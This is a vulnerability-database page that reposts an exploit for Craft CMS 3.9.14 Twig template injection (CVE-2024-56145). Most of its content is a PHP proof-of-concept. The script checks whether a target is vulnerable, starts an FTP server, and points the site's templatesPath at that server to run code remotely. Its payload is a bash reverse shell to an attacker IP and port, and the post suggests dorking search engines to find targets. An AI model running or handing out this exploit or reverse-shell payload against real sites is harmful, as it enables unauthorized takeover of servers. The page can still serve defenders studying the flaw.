Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Craft CMS 3.9.14 Remote Command Execution

🗓️ 13 Mar 2025 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 296 Views

Craft CMS 3.9.14 allows remote command execution via Twig template injection vulnerability.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for Code Injection in Craftcms Craft_Cms
20 Dec 202403:34
githubexploit
GithubExploit		Exploit for Code Injection in Craftcms Craft_Cms
6 Apr 202510:16
githubexploit
GithubExploit		Exploit for Code Injection in Craftcms Craft_Cms
22 Dec 202411:53
githubexploit
0day.today		Craft CMS Twig Template Injection / Remote Code Execution Exploit
27 Jan 202500:00
zdt
ATTACKERKB		CVE-2024-56145
18 Dec 202400:00
attackerkb
Circl		CVE-2024-56145
18 Dec 202422:54
circl
CISA KEV Catalog		Craft CMS Code Injection Vulnerability
2 Jun 202500:00
cisa_kev
CISA		 CISA Adds Five Known Exploited Vulnerabilities to Catalog
2 Jun 202512:00
cisa
CNNVD		Craft CMS 代码注入漏洞
18 Dec 202400:00
cnnvd
CNVD		Craft CMS Unauthenticated Remote Code Execution Vulnerability
25 Dec 202400:00
cnvd
Rows per page
=============================================================================================================================================
    | # Title     : Craft CMS 3.9.14 Remote Command Execution vulnerability                                                                     |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://craftcms.com/docs/getting-started-tutorial/build/twig.html                                                          |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description:  exploits a Twig template injection vulnerability in Craft CMS by abusing the --templatesPath argument. The vulnerability allows arbitrary template loading via FTP, leading to remote code execution.
    
        (Related : https://packetstorm.news/files/id/188825/ Related CVE numbers:	CVE-2024-56145 ) .
    	
    [+] Payload : 
    
    [+] Set Target : line 52
    
    [+] Usage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    class Exploit {
        private $target;
        private $ftp_host;
        private $ftp_port;
        private $payload;
        
        public function __construct($target, $ftp_host, $ftp_port, $payload) {
            $this->target = $target;
            $this->ftp_host = $ftp_host;
            $this->ftp_port = $ftp_port;
            $this->payload = $payload;
        }
        
        public function checkVulnerability() {
            $nonce = bin2hex(random_bytes(4));
            $url = $this->target . '?--configPath=/' . $nonce;
            $response = file_get_contents($url);
            
            if (strpos($response, 'mkdir()') !== false && strpos($response, $nonce) !== false) {
                return true;
            }
            return false;
        }
        
        public function startFTPServer() {
            $ftp_command = "python3 -m pyftpdlib -p {$this->ftp_port} &";
            shell_exec($ftp_command);
        }
        
        public function triggerExploit() {
            $templatesPath = "ftp://{$this->ftp_host}:{$this->ftp_port}";
            $url = $this->target . "?--templatesPath=" . urlencode($templatesPath);
            file_get_contents($url);
        }
        
        public function execute() {
            if ($this->checkVulnerability()) {
                echo "[+] Target is vulnerable. Starting exploit...\n";
                $this->startFTPServer();
                sleep(2); // Allow FTP server to start
                $this->triggerExploit();
                echo "[+] Exploit triggered successfully.\n";
            } else {
                echo "[-] Target is not vulnerable.\n";
            }
        }
    }
    
    // Example Usage
    $target = "http://example.com";
    $ftp_host = "192.168.1.100";
    $ftp_port = 2121;
    $payload = "bash -c 'bash -i >& /dev/tcp/192.168.1.200/4444 0>&1'";
    
    $exploit = new Exploit($target, $ftp_host, $ftp_port, $payload);
    $exploit->execute();
    
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Mar 2025 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 49.3
EPSS0.93926
SSVC
craft cmsremote command executiontwig template injectionvulnerabilityarbitrary template loadingftp exploitation.
296